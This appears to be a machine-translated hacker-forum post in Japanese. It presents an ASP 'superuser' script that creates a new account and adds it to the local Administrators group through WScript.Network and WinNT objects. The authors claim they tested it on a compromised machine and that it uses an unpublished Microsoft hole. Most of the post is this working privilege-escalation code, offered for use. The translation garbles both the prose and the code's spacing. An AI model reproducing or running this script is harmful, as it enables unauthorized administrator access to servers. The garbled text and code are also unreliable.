スーパーユーザーの.ASPコード[ブルースクリーンのオリジナル、ケビン改善、MS未発表の脆弱性]を追加しました
著者:ブルースクリーン、ケビンの記事出典:フリーズポイントエクストリーム
実際、ケビンと私は先週私のブロイラーでそれをテストしました、そしてカバの叙事詩。その結果、管理者グループのユーザーはユーザー許可の下で正常に追加されました(私の目は信じられませんが)。
ケビンが最後に何も言わなかったとき、私はそれを投稿しようとしませんでした...今、私は彼が彼のブログにそれを投稿しているのを見たので、私はそれを転送しました(前回テストしたときよりも少し良かったです、そして私はフォームを追加しました)。今、私は皆さんにとって幸運です `` `
とにかく、コードは正しいですが、それはめったに成功することはありません、それは運に依存します。 。ハハ、次のステップ私は彼を海に統合したいと思います。ちょっとハイ。
コードコピーは次のとおりです。
<head> .Networkオブジェクトスクリプト許可エンハンスメントエクスプロイトツール</head>
<formaction = "useradd.asp" method = post>
ユーザー:<inputname = "username" type = "text" value = "kevin1986"> <br>
パスワード:<inputname = "passwd" type = "password"> <br>
<inputtype = "submit" value = "add">
</form>
<%@codepage = 936
onerrorresumenext
ifrequest.servervariables( "remote_addr")<> "127.0.0.1" then
Response.Write "ip!sn0tright"
それ以外
ifrequest( "username")<> "" then
username = request( "username")
passwd = request( "passwd")
Response.Expires = 0
session.timeout = 50
server.scripttimeout = 3000
setlp = server.createObject( "wscript.network")
oz = "winnt://"&lp.computername
setob = getobject(oz)
setoe = getobject(oz& "/administrators、group")
setod = ob.create( "user"、username)
od.setpasswordpasswd
od.setinfo
OE.Addoz& "/"&username
iferrthen
Response.Write「ねえ~~今日は6+1を購入しないでください...コークスのボトルを買うために2元を節約する方が良いです...」
それ以外
ifinstr(server.createObject( "wscript.shell")。exec( "cmd.exe/cnetuser"&username.stdout.readall)、 "last login")> 0then
response.write「エラーはありませんが、それは正常に確立されていないようです。あなたは非常に落ち込んでいる必要があります。」
それ以外
response.write "omg!"&username& "accountは実際にはなりました!これは未知の抜け穴です。5,000,000rmbはあなたのものです。」
endif
endif
それ以外
Response.Write「ユーザー名を入力してください」
endif
endif
%>